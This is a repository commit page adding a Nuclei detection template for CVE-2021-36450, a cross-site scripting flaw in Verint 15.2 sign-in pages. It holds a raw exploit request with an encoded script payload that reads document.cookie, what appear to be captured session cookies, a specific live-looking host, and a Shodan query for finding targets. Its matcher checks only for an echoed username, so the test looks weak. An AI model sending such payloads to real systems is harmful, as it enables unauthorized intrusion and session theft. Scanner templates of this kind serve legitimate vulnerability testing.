daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add CVE-2021-36450.yaml

patch-1
atomic 2022-07-13 22:37:09 -04:00 committed by GitHub
parent 0bece54ed2
commit def429e927
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 51 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
cves/2021/CVE-2021-36450.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2021-36450
info:
name: Verint 15.2 XSS
author: atomiczsec
severity: medium
description: F Verint 15.2 (15.2.8.10048) Cross Site Scripting (XSS)
reference:
- https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
- https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
metadata:
shodan-query: title:"Verint Sign-in"
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2021-36450
cwe-id: CWE-79
tags: cve,cve2021,xss
requests:
- raw:
- |-
POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 HTTP/1.1
Host: {{Hostname}}
Cookie: BIGipServer~WFO~WFO_VERINTAPP_HTTPS=1008015114.47873.0000; TS019568ef=012ae9fa175730d8c6833bc61a72737e509d8e4e11353b3e5616f302159403288a8010f798cf861e68949a5e2ab28fa9e5cabe247e; JSESSIONID=6j_0IpQrt2_52N1gIC6eGXNeMrla5evPz-az1EdLYZJI1XrS3NSg!-1403817999
Content-Length: 155
Cache-Control: max-age=0
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://verint11.five9-wfo.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://verint11.five9-wfo.com/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
browserCheckEnabled=true&username=TEST&language=en_US&defaultHttpPort=-1&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login
matchers-condition: and
matchers:
- type: word
part: body
words:
- class="loginUserNameText">TEST